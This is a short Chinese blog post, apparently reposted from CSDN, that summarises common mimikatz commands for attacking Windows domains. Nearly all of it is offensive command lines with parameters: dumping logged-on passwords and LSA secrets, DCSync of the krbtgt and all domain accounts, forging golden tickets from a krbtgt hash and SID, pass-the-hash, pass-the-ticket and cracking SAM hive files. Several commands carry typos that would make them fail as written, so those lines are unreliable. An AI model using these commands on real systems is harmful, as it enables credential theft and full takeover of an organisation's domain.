mimikatz常用命令总结

前言

在管理员权限下使用,如果没有管理员权限,基本每个功能都无法正常使用,切记。

命令

普通管理员权限可以执行的命令(密码查询与权限检测与日志记录)

lsadump::lsa /inject 可以查看所有用户的所有详细信息
在这里插入图片描述

privilege::debug 打开第一个命令,且必须执行。
log 将这条命令执行后的所谓有输出存在当前目录下的mimikatz.log文件中。
在这里插入图片描述
sekurlsa::logonpasswords 列出已登陆用户的密码(比较常用)
在这里插入图片描述

域控权限才能执行的命令

lsadump::dcsync /domain:test.com /user:krbtgt 输出指定用户的密码信息

lsadump::dcsync /domain:test.com /all /csv 列出域内所有用户的账号密码
在这里插入图片描述

黄金票据相关

清除与查询票据信息

kerberos::list 列出说所有票据
kerberos::purge 删除所有票据
在这里插入图片描述
sekurlsa::kerberos 列出已被验证的kerberos凭证(几乎没用过且只能在域内使用)
在这里插入图片描述
sekurlsa::tickets /export 列出所有票据(基本没用过且只能在域内用)
在这里插入图片描述

制作票据

使用nthash制作票据

kerberos::golden /user:Administrator /domain:test.com /sid:S-1-5-21-4166986646-4168497534-2490551922 /krbtgt:308390d1ca7addf22c84ba9f1d26cbe4 /ticket:1.kirbi

使用krbtgt的hash值:

kerberos::gloden /user:Administrator /domain:xxx.xxx.xxx /sid:xxxxxxxxxxxxx krbtgt:ntlm-hashvlaue /ticket:test.kribi

使用krbtgt的aes256值:

kerberos::gloden /domain:xxx.xxx /sid:xxxxxxxxxxx /aes256:xxxxxxxx /user:Administrator /ticket:test.kribi

pth攻击:

sekurlsa::pth /domian:test.com /user: zhangsan /ntlm:3dbde697d71690a769204beb12283678
lsadump::dcsync /domain:test.com /all /csv

加载票据到缓存

kerberos::ptt 1.kirbi

破解sam文件

lsadump::sam /sam:sam.hiv /system:system.hiv

参考
mimikatz使用方法

猜你喜欢

转载自blog.csdn.net/qq_41874930/article/details/108266353